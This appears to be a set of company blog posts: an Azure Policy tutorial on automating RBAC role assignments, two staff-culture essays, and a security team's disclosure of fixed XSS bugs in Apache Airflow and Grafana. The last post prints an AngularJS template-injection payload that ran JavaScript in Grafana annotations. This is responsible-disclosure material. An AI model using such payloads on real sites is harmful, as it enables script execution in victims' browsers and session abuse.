Using Azure policies to audit and automate RBAC role assignments

RBAC role assignments in Azure are often inherited from the subscription or management group level, but there may come a time when that scope is just way too broad for granting permissions to an AD user group.

While it’s tempting to assign permissions at a larger scope, sometimes you’d rather grant only some of the subscription’s resource groups an RBAC role with the minimal permissions needed to accomplish the task at hand. In those scenarios you’ll usually end up with one of the following options for handling the role assignments:

  1. Include the role assignments in your ARM templates / Terraform code / Bicep templates
  2. Manually add the role to proper resource groups

If neither of these appeals to you, there’s a third option: define an Azure policy which identifies the correct resource groups and then deploys the RBAC role assignments automatically if the conditions are met. This blog post goes through step-by-step instructions on how to:

  • Create a custom Azure policy definition for assigning the Contributor RBAC role to an Azure AD group
  • Create a custom RBAC role for policy deployments and add it to your policy definition
  • Create an assignment for the custom policy

The example scenario is very specific, and the policy definition is created to match this particular scenario. You can use the solution provided in this post as a basis for creating something that fits your needs exactly.

Azure policies in brief

Azure policies are a handy way to add automation and audit functionality to your cloud subscriptions. Policies can be applied to make sure resources are created following the company’s cloud governance guidelines, for example for resource tagging or picking the right SKUs for VMs. Microsoft provides a lot of different built-in policies that are pretty much ready for assignment. For more specific needs, however, you’ll usually end up creating a custom policy that better suits your requirements.

Using Azure policies is divided into two main steps:

  1. You need to define a policy, which means creating a ruleset (policy rule) and the action (effect) to apply if a resource matches the defined rules.
  2. Then you must assign the policy to the desired scope (management group / subscription / resource group / resource level). The assignment scope defines the highest level at which resources are scanned against the policy criteria; usually management group or subscription level is preferable.

Depending on how you prefer to govern your environment, you can choose to use individual policies or group multiple policies into initiatives. Initiatives help you simplify assignments by working with groups instead of individual assignments. They also help with handling service principal permissions: if you create a separate policy for enforcing each of five different tags, you’ll end up with five service principals that all have the same permissions unless you group the policies into a single initiative, as sketched below.
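
For illustration, an initiative is simply a policy set definition that references the individual policy definitions. A minimal sketch (the display name and the definition IDs below are placeholders, not taken from this post):

{
	"properties": {
		"displayName": "Enforce required tags",
		"policyType": "Custom",
		"description": "Groups the individual tag policies into one assignable initiative.",
		"metadata": {
			"category": "Tags"
		},
		"parameters": {},
		"policyDefinitions": [{
				"policyDefinitionId": "/subscriptions/your_subscription_id/providers/Microsoft.Authorization/policyDefinitions/enforce-tag-costcenter"
			}, {
				"policyDefinitionId": "/subscriptions/your_subscription_id/providers/Microsoft.Authorization/policyDefinitions/enforce-tag-owner"
			}
		]
	}
}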

Creating the policy definition for assignment of Contributor RBAC role

The RBAC role assignment can be done with a policy that targets the desired scope of resources through policy rules. So first we’ll define some basic properties for our policy that tell other users what this policy is meant for. A few notes:

  • Policy type = custom. Everything that’s not built-in is custom.
  • Mode = all since we won’t be creating a policy that enforces tags or locations
  • Category can be anything you like. We’ll use “Role assignment” as an example
{
	"properties": {
		"displayName": "Assign Contributor RBAC role for an AD group",
		"policyType": "Custom",
		"mode": "All",
		"description": "Assigns Contributor RBAC role for AD group resource groups with Tag 'RbacAssignment = true' and name prefix 'my-rg-prefix'. Existing resource groups can be remediated by triggering a remediation task.",
		"metadata": {
			"category": "Role assignment"
		},
		"parameters": {},
		"policyRule": {}
	}
}

Now we have our policy’s base information set. It’s time to form the policy rule. The policy rule consists of two blocks: if and then. The first one is the actual rule definition and the latter defines what should be done when the conditions are met. We want to target only a few specific resource groups, so the scope can be narrowed down with tag evaluations and resource group naming conventions. To do this, let’s add an allOf operator (which works like the logical operator ‘and’) to the policy rule and set up the conditions:

{
	"properties": {
		"displayName": "Assign Contributor RBAC role for an AD group",
		"policyType": "Custom",
		"mode": "All",
		"description": "Assigns Contributor RBAC role for AD group resource groups with Tag 'RbacAssignment = true' and name prefix 'my-rg-prefix'. Existing resource groups can be remediated by triggering a remediation task.",
		"metadata": {
			"category": "Role assignment"
		},
		"parameters": {},
		"policyRule": {
			"if": {
				"allOf": [{
						"field": "type",
						"equals": "Microsoft.Resources/subscriptions/resourceGroups"
					}, 	{
						"field": "name",
						"like": "my-rg-prefix*"
					},	{
						"field": "tags['RbacAssignment']",
						"equals": "true"
					}
				]
			},
			"then": {}
		}
	}
}

As can be seen from the JSON, the policy is applied to a resource (or actually a resource group) if

  • Its type is Microsoft.Resources/subscriptions/resourceGroups, i.e. the target resource is a resource group
  • It has a tag named RbacAssignment set to true
  • The resource group name starts with my-rg-prefix

In order for the policy to actually do something, an effect must be defined. Because we want the role assignment to be automated, the deployIfNotExists effect is perfect. A few notes on how to set up the effect:

  • The most important stuff is in the details block
  • For RBAC role assignments, the type of the deployment and the scope of the existence check is Microsoft.Authorization/roleAssignments
  • The existence condition is essentially another if block: the policy rule checks whether a resource matches the conditions that make it applicable to the policy, and the existence check then confirms whether the requirements in the details block are met. If not, an ARM template is deployed to the scoped resource

The existence condition of the then block in the code example below checks the role assignment for a principal ID through a combination of Microsoft.Authorization/roleAssignments/roleDefinitionId and Microsoft.Authorization/roleAssignments/principalId. Since we want to assign the policy to a subscription, the roleDefinitionId path must include the /subscriptions/<your_subscription_id>/.. part in order for the policy to work properly.

{
	"properties": {
		"displayName": "Assign Contributor RBAC role for an AD group",
		"policyType": "Custom",
		"mode": "All",
		"description": "Assigns Contributor RBAC role for AD group resource groups with Tag 'RbacAssignment = true' and name prefix 'my-rg-prefix'. Existing resource groups can be remediated by triggering a remediation task.",
		"metadata": {
			"category": "Role assignment"
		},
		"parameters": {},
		"policyRule": {
			"if": {
				"allOf": [{
						"field": "type",
						"equals": "Microsoft.Resources/subscriptions/resourceGroups"
					}, 	{
						"field": "name",
						"like": "my-rg-prefix*"
					}, {
						"field": "tags['RbacAssignment']",
						"equals": "true"
					}
				]
			},
			"then": {
				"effect": "deployIfNotExists",
				"details": {
					"type": "Microsoft.Authorization/roleAssignments",
					"roleDefinitionIds": [
						"/providers/microsoft.authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c20a72d9" // Use user access administrator role update RBAC role assignments
					],
					"existenceCondition": {
						"allOf": [{
								"field": "Microsoft.Authorization/roleAssignments/roleDefinitionId",
								"equals": "/subscriptions/your_subscription_id/providers/Microsoft.Authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c" // RBAC role definition ID for Contributor role
							}, {
								"field": "Microsoft.Authorization/roleAssignments/principalId",
								"equals": "OBJECT_ID_OF_YOUR_AD_GROUP" // Object ID of desired AD group
							}
						]
					}
				}
			}
		}
	}
}

The last thing to add is the actual ARM template that will be deployed if the existence conditions are not met. The template itself is fairly simple since it only contains the definition for an RBAC role assignment.

{
	"properties": {
		"displayName": "Assign Contributor RBAC role for an AD group",
		"policyType": "Custom",
		"mode": "All",
		"description": "Assigns Contributor RBAC role for AD group resource groups with Tag 'RbacAssignment = true' and name prefix 'my-rg-prefix'. Existing resource groups can be remediated by triggering a remediation task.",
		"metadata": {
			"category": "Tags",
		},
		"parameters": {},
		"policyRule": {
			"if": {
				"allOf": [{
						"field": "type",
						"equals": "Microsoft.Resources/subscriptions/resourceGroups"
					}, 	{
						"field": "name",
						"like": "my-rg-prefix*"
					}, {
						"field": "tags['RbacAssignment']",
						"equals": "true"
					}
				]
			},
			"then": {
				"effect": "deployIfNotExists",
				"details": {
					"type": "Microsoft.Authorization/roleAssignments",
					"roleDefinitionIds": [
						"/providers/microsoft.authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c20a72d9" // Use user access administrator role update RBAC role assignments
					],
					"existenceCondition": {
						"allOf": [{
								"field": "Microsoft.Authorization/roleAssignments/roleDefinitionId",
								"equals": "/subscriptions/your_subscription_id/providers/Microsoft.Authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c" // RBAC role definition ID for Contributor role
							}, {
								"field": "Microsoft.Authorization/roleAssignments/principalId",
								"equals": "OBJECT_ID_OF_YOUR_AD_GROUP" // Object ID of desired AD group
							}
						]
					},
					"deployment": {
						"properties": {
							"mode": "incremental",
							"template": {
								"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
								"contentVersion": "1.0.0.0",
								"parameters": {
									"adGroupId": {
										"type": "string",
										"defaultValue": "OBJECT_ID_OF_YOUR_AD_GROUP",
										"metadata": {
											"description": "ObjectId of an AD group"
										}
									},
									"contributorRbacRole": {
										"type": "string",
										"defaultValue": "[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c')]",
										"metadata": {
											"description": "Contributor RBAC role definition ID"
										}
									}
								},
								"resources": [{
										"type": "Microsoft.Authorization/roleAssignments",
										"apiVersion": "2018-09-01-preview",
										"name": "[guid(resourceGroup().id, deployment().name)]",
										"properties": {
											"roleDefinitionId": "[parameters('contributorRbacRole')]",
											"principalId": "[parameters('adGroupId')]"
										}
									}
								]
							}
						}
					}
				}
			}
		}
	}
}

And that’s it! Now we have the policy definition set up for checking and remediating the default RBAC role assignment in our subscription. If the automated deployment feels too daunting, the effect can be swapped to the auditIfNotExists version. That way you won’t deploy anything automatically, but you can simply audit all the resource groups in the scope for the default RBAC role assignment.

{
	"properties": {
		"displayName": "Assign Contributor RBAC role for an AD group",
		"policyType": "Custom",
		"mode": "All",
		"description": "Assigns Contributor RBAC role for AD group resource groups with Tag 'RbacAssignment = true' and name prefix 'my-rg-prefix'. Existing resource groups can be remediated by triggering a remediation task.",
		"metadata": {
			"category": "Tags",
		},
		"parameters": {},
		"policyRule": {
			"if": {
				"allOf": [{
						"field": "type",
						"equals": "Microsoft.Resources/subscriptions/resourceGroups"
					}, 	{
						"field": "name",
						"like": "my-rg-prefix*"
					}, {
						"field": "tags['RbacAssignment']",
						"equals": "true"
					}
				]
			},
			"then": {
				"effect": "auditIfNotExist",
				"details": {
					"type": "Microsoft.Authorization/roleAssignments",
					"existenceCondition": {
						"allOf": [{
								"field": "Microsoft.Authorization/roleAssignments/roleDefinitionId",
								"equals": "/subscriptions/your_subscription_id/providers/Microsoft.Authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c" // RBAC role definition ID for Contributor role
							}, {
								"field": "Microsoft.Authorization/roleAssignments/principalId",
								"equals": "OBJECT_ID_OF_YOUR_AD_GROUP" // Object ID of desired AD group
							}
						]
					}
				}
			}
		}
	}
}

That should be enough, right? Well, it isn’t. Since we’re using an ARM template deployment with our policy, we must add a role with privileges to create remediation tasks, which essentially means a role that has privileges to create and validate resource deployments. Azure doesn’t provide such a role with minimal privileges out-of-the-box, since the only built-in role that has all the permissions we need is Owner. We naturally don’t want to give Owner permissions to anything if we really don’t have to. The solution: create a custom RBAC role for Azure Policy remediation tasks.

Create custom RBAC role for policy remediation

Luckily, creating a new RBAC role for our needs is a fairly straightforward task. You can create new roles in the Azure portal or with PowerShell or Azure CLI. Depending on your preferences and permissions in Azure, you’ll want to create the new role at the management group or subscription level to contain it to the level where it is needed. Of course there’s no harm in spreading the role to a wider area of your Azure environment, but for the sake of keeping everything tidy, we’ll create the new role in one subscription since it’s not needed elsewhere for the moment.

Note that the custom role only allows validating and creating deployments. That alone is not enough to actually do anything. You’ll need to combine the deployment role with a role that has permissions to perform the actions defined in the deployment. For RBAC role assignments, you’d need to add the “User Access Administrator” role to the deployer as well.

Here’s how to do it in the Azure portal (an equivalent JSON role definition is shown after the steps):

  1. Go to your subscription listing in Azure, pick the subscription you want to add the role to and head to the Access control (IAM) tab.
  2. From the top toolbar, click on the “Add” menu and select “Add custom role”.
  3. Give your role a clear, descriptive name, such as Least privilege deployer.
  4. Add a description.
  5. Add permissions Microsoft.Resources/deployments/validate/action and Microsoft.Resources/deployments/write to the role.
  6. Set the assignable scope to your subscription.
  7. Review everything and save.
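
If you prefer to avoid clicking through the portal, the same role can be described as a JSON role definition and created with Azure CLI (az role definition create) or PowerShell. A minimal sketch, with the role name and the subscription ID as placeholders:

{
	"Name": "Least privilege deployer",
	"IsCustom": true,
	"Description": "Can validate and create ARM deployments for Azure Policy remediation tasks.",
	"Actions": [
		"Microsoft.Resources/deployments/validate/action",
		"Microsoft.Resources/deployments/write"
	],
	"NotActions": [],
	"AssignableScopes": [
		"/subscriptions/your_subscription_id"
	]
}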

After the role is created, check its properties and take note of the role ID. Next, we’ll need to update the policy definition made earlier so that the new RBAC role gets assigned to the service principal during the policy (initiative) assignment.

So, in the template, change this in the effect block:

"roleDefinitionIds": [
	"/providers/microsoft.authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c20a72d9" // Use user access administrator role update RBAC role assignments
]

to this:

"roleDefinitionIds": [
	"/providers/microsoft.authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c20a72d9", // Use user access administrator role update RBAC role assignments
	"/subscriptions/your_subscription_id/providers/Microsoft.Authorization/roleDefinitions/THE_NEW_ROLE_ID" // The newly created role with permissions to create and validate deployments
]

Assigning the created policy

Creating the policy definition is not enough for the policy to take effect. As mentioned before, the definition is merely a ruleset created for assigning the policy, and it does nothing without a policy assignment. Like definitions, assignments are set to a desired scope. Depending on your policy, you can assign it at the management group level, or create individual assignments at the subscription level with parameter values that fit each individual subscription as needed.

Open Azure Policy and select “Assignments” from the left-side menu. You’ll find “Assign policy” in the top toolbar. There are a few considerations you should go over when assigning a policy:

Basics

  • The scope: always think about your assignment scope before blindly assigning policies that modify your environment.
  • Exclusions are a possibility, not a necessity. If you find yourself adding a lot of exclusions, you should probably re-evaluate the policy definition instead.
  • Policy enforcement: if you have ANY doubts about the policy you have created, don’t enforce it. That way you won’t accidentally overwrite anything. It might be a good idea to assign the policy without enforcement the first time, review the compliance results and, if you’re happy with them, then enforce the policy.
    • You can fix all the non-compliant resources with a remediation task after initial compliance scan

Remediation

  • If you have a policy that changes something with either the modify or deployIfNotExists effect, a service principal will be created for implementing the changes when you assign the policy. Be sure to check that the location (region) of the service principal matches your desired location.
  • If you choose to create a remediation task upon assignment, it will apply the changes in the policy to existing resources. So if you have any doubts about whether the policy works as you intend, do not create a remediation task during assignment. Review the compliance results first, then create the remediation task if everything’s ok.

Non-compliance message

  • It’s usually a good idea to create a custom non-compliance message for your own custom definitions.

After you’ve set up everything relevant for the assignment and created it, it’s time to wait for the compliance checks to go through. When you’ve created an assignment, the first compliance check cycle is usually done within 30 minutes of the assignment creation. After the first cycle, compliance is evaluated once every 24 hours or whenever the assigned policy definitions are changed. If that’s not fast enough for you, you can always trigger an on-demand evaluation scan (for example with the az policy state trigger-scan command).

Solita Cloud Manifesto – We all love tinkering

“Tinkering” is a term for a form of tweaking. One user of the Finnish urban dictionary website puts it as “what computer people call programming or some such tweaking”. Tinkering and tweaking are words often used by specialists working with automatic data processing, and especially infrastructure and operating systems; sometimes several times a day. Many use tinkering as a general description of everything that an infrastructure expert does for a job; some of us drive cars, some of us wash cars, some of us tinker with infrastructure.

In order to find new approaches to the hard core of tinkering, I had a talk with two fresh faces at Solita Cloud, Tommi Ritvanen and Lauri Moilanen. We focused on the question of what tinkering actually is, reaching pretty far down the rabbit hole, and also discussed what is included in tinkering. Finally, we naturally considered how the newly-published Solita Cloud Manifesto has manifested in the everyday work of our professionals.

We gave a lot of thought to whether tinkering is a professional activity. It could also be seen as an amateurish term – something that refers to artisanal “gum and tape” contraptions rather than professional, fully automated and easily replicated solutions. Lauri Moilanen said that he puts in as much work as possible to minimise tinkering. This is not the full picture, as he continues to state that tinkering is a very interesting phase, but it’s only the first phase. What is even more interesting is how the chosen initial setup can be refined into a professional final product. Tommi Ritvanen had a different perspective. If there is no ready-made solution for the required product, he sees tinkering as producing the automated final product.

In the Solita Cloud Manifesto, we posit that “tinkering is a combination of interest and learning experiences”.

Tommi suggests that tinkering is not always smooth sailing. One has to – or gets to – work on, polish, iterate and grapple with the final product. One cornerstone of learning at Solita is learning by doing, and we believe that 70 per cent of creative experts’ learning happens through everyday work and experiments. An academic attitude in thinking is highly advantageous when learning from books or documentation and to come up with hypothetical solutions for a given problem – or when considering the problem itself.

True individual learning events are related to learning by doing, and, in particular, to learning by doing something outside one’s comfort zone. Purely technical slogging is rarely what happens in Solita projects. Because our business is about people creating solutions for others who use them, the object of tinkering is often not only our customers’ processes and operating methods, but also those of Solita.

Tommi and Lauri have different profiles at Solita Cloud. Their career paths are different, but both think that they now find themselves in a position where they have wanted to be. Working at Solita is the sum of their own choices. Currently, Tommi works in the Cloud maintenance team and Lauri works as an infrastructure specialist in two projects.

Is it okay to say no at Solita, and is it possible to pursue your own interests?

Tommi says that the maintenance team has people from different backgrounds. The team members can take their work in whatever direction they wish, but their activities are limited by the reactive side of maintenance. “Maintenance requires you to take care of things, even if you don’t want to,” says Lauri, who has experience in maintenance work prior to Solita. Maintenance team members must be flexible and willing to learn and do things. There is no hiding in a silo. “You encounter many new things in maintenance, so you take them on and want to try everything,” says Tommi.

In projects, the resourcing stage largely dictates what the specialist will be doing. Although the situation may be an overly complex puzzle with indirect consequences for every move, at its best, the resourcing stage can be a dialogue between the specialist, the account, and Cloud’s resourcing manager, Jukka Kantola. The importance of communication is highlighted even before the actual work begins.

Lauri says that there is a sense of psychological safety at Solita Cloud. According to him, it is okay to say “no” to resourcing, and there is no hidden pressure in the environment forcing people to do what they would rather not. He points to the important observation that he is not afraid to say no in this environment.

The customer’s end goal may not be clear at the resourcing stage, so the team of specialists is expected to continuously investigate it and find facts – and maintain situational awareness. In other words, the work’s expectations may not be precisely worded, or the vision of the desired end result may change already in the early stages of the project. Changes are likely as the project progresses, whether the identified project model is like a waterfall or agile.

Those individuals working in Solita projects are authorised and obligated to discover and clarify what needs to be done and why, as in what needs to be achieved by the end result. The will to understand the whole connects all Solita employees, and Solita project managers are especially skilled at taking hold of all the strings and leading communication.

The specialists have personal motivations that we have collected somewhat frequently through, for example, our Moving Motivators exercises. Lauri offers his thoughts on how to express the feeling of “doing a job with a purpose”: “When you turn off your computer, you are left with a feeling that you did something meaningful and accomplished things,” says Lauri about his personal motivation. Motivated people produce better results, which equally benefit Solita, our customers, and the employee in question. Motivation, but also confusion, often manifest in people attempting to challenge external requirements and pushing themselves physically to reach high-quality results. “An attitude of ‘just get something done’ kills motivation and often surfaces when there’s a rush,” says Lauri.

In the crossfire of moving targets and ambiguous goals, we at Solita have to understand the limits of our personal ability and be able to take on technically challenging situations in projects as a community. We at Solita Cloud are a group of people from a variety of backgrounds with different motivations, and we may not be focused on a single clear target in our everyday work. But we all love tinkering.

The key technologies and skills in our Cloud community

The cloud market is evolving and we want to stay at the forefront of the development. One way to do this is to get the pulse from our employees and hear what they have to say about cloud technologies, attractive roles, and important skills in the field. In our recent survey among our Cloud Specialists and Consultants, we got a sneak peek into their thoughts.

When asking about the most used technologies, GNU/Linux ranked as number one, and it doesn’t surprise me. It’s a core technology after all, and people in the field are generally eager to use it. Regardless of what we do in the cloud, GNU/Linux distributions provide the foundation we build on. Terraform and Ansible are also frequently used, which means that Solitans are keen on automation. Instead of manual work, we tend to build automated processes to work smarter and minimize the risk of human error. Git and Jenkins are also high on the list, indicating that, in conjunction with automation, agile DevOps practices, and by extension GitOps, are loved and followed.

Looking at the cloud technologies, I’m quite happy to see that Google Cloud Platform ranks as one of the most used, or at least most sought-after, cloud technologies by our cloud specialists and consultants alike. AWS has traditionally been the most popular cloud tech in Finland, but I’m glad that the available alternatives are also gaining traction now. Azure has its place too, but surprisingly it’s not exceptionally high in the minds of our specialists even though its market share is significantly larger than, for example, Google Cloud Platform’s.

Personally, I think Google Cloud has great advantages, especially here in Finland. They have a data center in Hamina, which plays an important role for those customers who deal with sensitive data and want their data to be stored in Finland. Google is the only provider that can offer this option. I believe that Google Cloud Services will become increasingly popular, which will reflect on the talent market. Already now, we can see a shortage of talent in this area, which is why Solita launched its own training program together with Academic Work. This way, we are able to train Google specialists ourselves.

Based on the results of the survey, Docker and Kubernetes continue their victory march as the go-to technologies for delivering and modernizing applications regardless of the customer case. Google Kubernetes Engine in particular seems to have gained traction, thanks to its ease of use compared to the competition when using, or considering using, a platform to deploy customers’ Docker containers.

Senior Cloud Service Specialists and Architects are the most attractive roles

In this survey, most of the respondents (60%) were Cloud Service Specialists, a quarter were Senior Cloud Service Specialists, and a smaller minority (12.5%) were Senior Cloud Consultants. For them, the most attractive next steps are Senior Cloud Service Specialist and Architect roles.

In general, the difference between a Cloud Service Specialist and a Consultant is that in many cases, Consultants deal more with PowerPoints and plan the big picture with the customer. Cloud Service Specialists focus more on the technical side of the work and deliver the projects. However, it’s not set in stone. We can be quite flexible with our roles at Solita, and within a certain framework, we can design our own roles based on our interests.

I work as a Senior Cloud Consultant myself, but I tend to be involved in the technical side quite often, as I enjoy rolling up my sleeves and “getting my hands into the mud”, as they say. No two days are alike; a cliché, I know, but true in my case at least. On any given day, I might be called upon to write code for a customer project if it involves cloud-native features. Or I might end up deploying a Terraform template to install something, and I might also create or present a PowerPoint deck and eat some delicious bear claw pastries with coffee while at it. A suit and a tie are optional!

The ability to manage one’s own work is an important skill

Our professionals consider the ability to lead one’s own work the most important skill. It’s also a skill where people need the most training. The pace has been quite hectic in recent years as we are growing as a company. While resourcing and people leaders are looking after the teams, people also need skills to manage their time and work. This has been noticed at Solita, and the company is providing support and courses around this topic.

I’ve experienced that the culture at Solita is supportive, which helps in preventing burnout. Caring is one of our core values and highly visible in daily work. It means that people are encouraged to ask for help, and there is always support available. Solita is not a workplace where constant overtime and long hours are celebrated.

Other competencies that rank high in the survey are customer consulting skills, presentation skills, and knowledge sharing skills. It makes complete sense in our context; to work successfully with customers, which is our main job, we need the consulting and presentation skills to communicate our vision efficiently and credibly. Knowledge sharing skills, on the other hand, play a crucial role in teamwork. And we are definitely looking for team players who are willing to contribute towards a common goal.

Understanding the big picture becomes more and more important

The industry is evolving, and I can see even larger corporations becoming more interested in cloud services. If cloud solutions used to be the thing in start-ups and smaller companies, the big players have now woken up to see the benefits. That changes our ways of working and brings up interesting challenges to tackle as we need to dive deeper into compliance, regulations, and cybersecurity topics. But the goals remain the same, guiding customers towards modern and agile solutions that support their business targets.

Generally, I think it’s important to understand that cloud services are a big entity, not just single technologies or hype words. If you want to develop your skills in this industry, project work is the way to do it. The trick here is to understand the bigger picture and put different tools and technologies together to build solutions that serve the customer. And it’s not about knowing everything about a single technology, but more about the mindset; how can we leverage different tools to gain the best results and learn as we go.

Growth with our customers continues and we are constantly looking for new colleagues in our cloud community! Check out our open positions here!

Solita Cloud Manifesto

Our shared idea crystallised in autumn 2020. In little more than five years, Solita Cloud has grown from a support function comprising five infrastructure specialists into an expert organisation with profitable business operations, consisting of more than 50 amazing experts in different positions and from different backgrounds. The change in thinking and everyday life has been significant, and change is never an easy thing to process. Even change accrues compound interest, and the longer you have been involved, the more radical the change seems to be.

People’s attitude to change and growth is what takes organisations forward. Operations are developing further. At Solita Cloud, however, we have missed having an anchor that keeps us all together – the original Cloud spirit of which we hear beautiful stories or heroic war tales by the breakroom table. During the pioneering days, we moved quickly forward and weren’t able to avoid all the painful stumbles. However, the common goal at the start steered us step by step. As we developed further, new competence needs emerged. We needed new people who, in turn, developed the culture further. The common anchor started to drift away. A need emerged to hit pause for a while to consider our common anchor in depth and to think about how we could better glue the community together again. Solita Cloud Manifesto emerged as one solution to the issue – after all, Solita’s software developers had made their own to be an excellent guideline for all Solita people.

Manifesto is a signpost created by the community itself, a way to express the company culture in words, ‘a household code’. It includes the key guidelines that we wish to follow as a community and that we also gently demand from our own actions. The manifesto evolves with the community and its surrounding world. I think that Norm Kerth’s Retrospective Prime Directive also reveals the deepest nature of the manifesto. Retrospective Prime Directive: “Regardless of what we discover, we understand and truly believe that everyone did the best job they could, given what they knew at the time, their skills and abilities, the resources available, and the situation at hand.” Thinking back, compiling the Cloud Manifesto seemed to be a certain kind of retrospective series and a learning journey into the core of Solita Cloud, or at least the perspective of it by one group.

The work to create the manifesto was launched at the end of a seminar day held in October, via a separate address. First, Janne Rintala held an opening address of the deepest essence of the Dev Manifesto and of the matters we should keep in mind. Janne’s empowering speech allowed us to gather a list of names of interested people with whom the work would be continued. When the seminar day was planned, the original idea was to hold a 1.5-hour workshop with 20 to 30 people during which the manifesto would be drafted or even finished. Retrospectively, it is good that we chose to give the manifesto a little more time and continue working on it with a smaller group of about five active participants. There would be time to go through the manifesto with everyone later, probably multiple times. From the start, it has been a key factor that the manifesto should serve Solita Cloud’s experts.

An hour for the work, repeated every Monday, was added to the calendars of the members of the group of active participants. We started from a clean slate and proceeded through discussions. We did not agree on everything, and sometimes we focused on everyday issues as examples, hoping that the manifesto’s value base would bring a solution to them. Through our good conversational culture and by valuing each other, we were able to find the words to express the four values in the manifesto. There were more proposals as values along the way; some were written into the theses under the values, while others were included in the public notes, reflecting the way our operations at Solita have been completely open from the start.

The format of Solita Cloud Manifesto was quite directly borrowed from the Dev Manifesto: four values with four theses each. I can’t claim that we haven’t borrowed some of the software developers’ guidelines, too. However, we made the manifesto our own and targeted it at Cloud experts. Finally, the manifesto also shows Solita’s value base:

  • Caring – Easy-going – Passion – Courage

At publication, it could be assumed that the published article is now finished. However, with something like this, I hope it is not. I hope that it will never be finished, but rather changes agilely with the times. At its best, it actively serves its followers.

The manifesto supports us in our daily lives, tells us which way to go and what to change, challenges us to pause and to think about where we currently are. We at Solita Cloud have agreed that the Cloud Manifesto can be changed, with the template agreed. We want to always include several people in this change and encourage discussion amongst the selected group, and we wish them to communicate the changes and the needed modifications to everyone else.

We needed 13 sessions to reach the first publishable result. This translates to around 60–80 working hours. We believe that this investment will save us these working hours several times in the future. We should still continue to pause in our daily lives, as exchanging experiences and learning from them together will benefit us continuously. With Cloud Manifesto, we, the Solita Cloud experts, wish to highlight the matters we all want to believe in. In the world of consultants, the daily work of specialists does not necessarily hold many common denominators. The purpose of Solita Cloud Manifesto was to ground us to our roots, strengthen our community and highlight matters important to it in our projects and client relationships. Even though the everyday work of an expert may take place elsewhere, a Solita Cloud expert will always know where to find support.

The story of Solita Cloud Manifesto will not end here. In the next blog posts, we will learn more about the values and theses of the Cloud Manifesto, as well as how they can be seen in the day-to-day expert work.

In search of XSS vulnerabilities

This is a blog post introducing our Cloud Security team and a few XSS findings we have found this year in various open source products.

Our team and what we do

Solita has a lot of security minded professionals working in various roles. We have a wide range of security know-how from threat assessment and secure software development to penetration testing. The Cloud Security team is mostly focused on performing security testing on web applications, various APIs, operating systems and infrastructure.

We understand that developing secure software is hard and do not wish to point fingers at the ones who have made mistakes, as it is not an easy task to keep software free of nasty bugs.

You’re welcome to contact us if you feel that you are in need of software security consultation or security testing.

Findings from Open Source products

Many of the targets that we’ve performed security testing for during the year of COVID have relied on a variety of open source products. Open source products are often used by many different companies and people, but very few of them do secure code review or penetration testing on these products. In general, a lot of people use open source products but only a few give feedback or patches, and this can give a false sense of security. However, we do think that open source projects that are used by a lot of companies have a better security posture than most closed source products.

Nonetheless, we’ve managed to find a handful of vulnerabilities from various open source products and as responsible, ethical hackers, we’ve informed the vendors and their software security teams about the issues.

The vulnerabilities found include e.g. Cross-Site Scripting (XSS), information disclosure and a payment bypass in one CMS plugin. But we’ll keep the focus of this blog post on the XSS vulnerabilities, since these have been the most common.

What is an XSS vulnerability

A cross-site scripting vulnerability, shortened to XSS, is a client-side vulnerability. XSS vulnerabilities allow attackers to inject client-side JavaScript code that gets executed on the victim’s client, usually a browser. Being able to execute JavaScript in a victim’s browser allows attackers, for example, to use the same functionality on the web site as the victim by riding on the victim’s session. Requests made through an XSS vulnerability also come from the victim’s IP address, which allows bypassing potential IP blocks.

All of the following vulnerabilities have been fixed by the vendors and updated software versions are available.

Apache Airflow

Apache Airflow is an open-source workflow management platform that is used by hundreds of companies such as Adobe, HBO, Palo Alto Networks, Quora, Reddit, Spotify, Tesla and Tinder. During one of our security testing assignments, we found that it was possible to trigger a stored XSS in the chart pages.

There are a lot of things you can configure and set in Apache Airflow. Usually we try to place injections in every input we can test, together with some random identifying text, so that we can later figure out which input was the root cause of a triggered payload.

In Apache Airflow we found that one error page did not properly construct its error messages in certain misconfiguration cases, which caused the error message to trigger JavaScript. Interestingly, in another place the error message was constructed correctly and the payload did not trigger there; this just shows how hard it is to identify every endpoint where a given functionality is exposed. Changing your name to an XSS payload does not usually trigger in the most common places where the name is shown, such as the profile page and posts, so you should always look for the more uncommon places as well. These uncommon places are usually not as well validated, simply because they are used less often and people barely remember they exist.


Timeline

15.04.2020 – The vulnerability was found and reported to Apache

20.04.2020 – Apache acknowledged the vulnerability

10.07.2020 – The bug was fixed in the update 1.10.11 and it was assigned the CVE-2020-9485

Grafana

Grafana is an open-source platform for monitoring and observability. It is used by thousands of companies globally, including PayPal, eBay, Solita, and our customers. During one of our security testing assignments, we found that it was possible to trigger a stored XSS via the annotation popup functionality.

The product sports all sorts of dashboards and graphs for visualizing the data. One feature of the graphs is the ability to include annotations for the viewing pleasure of other users.

While playing around with some basic content injection payloads, we noticed that it was possible to inject HTML tags into the annotations. These tags would then render when the annotation was viewed. One such tag was the image tag “<img>”, which can be used for running JavaScript via event handlers such as “onerror”. Unfortunately for us, the system had some kind of filtering in place and our malicious JavaScript payloads did not make it through.

While inspecting the DOM and source of the page, looking for a way to bypass the filtering, I noticed that AngularJS templates were in use, as there were references to ‘ng-app’. Knowing that naive use of AngularJS can lead to so-called client-side template injection, I decided to try out a simple payload with an arithmetic operation in it, ‘{{ 7 * 191 }}’. To my surprise, the payload got triggered and the annotation showed the value of the calculation, 1337!

A mere calculator was not sufficient though, and I wanted to pop that tasty alert window with this newly found injection. There used to be a protective expression sandbox mechanism in AngularJS, but its developers probably grew tired of the never-ending cat-and-mouse game and the sandbox escapes that hackers were coming up with, so they removed the sandbox altogether in version 1.6. As such, the payload ‘{{constructor.constructor(‘alert(1)’)()}}’ did the trick, and at this point I decided to write a report for the Grafana security team.

Timeline

16.04.2020 – The vulnerability was found and reported to the security team at Grafana

17.04.2020 – Grafana security team acknowledged the vulnerability

22.04.2020 – CVE-2020-12052 was assigned to the vulnerability

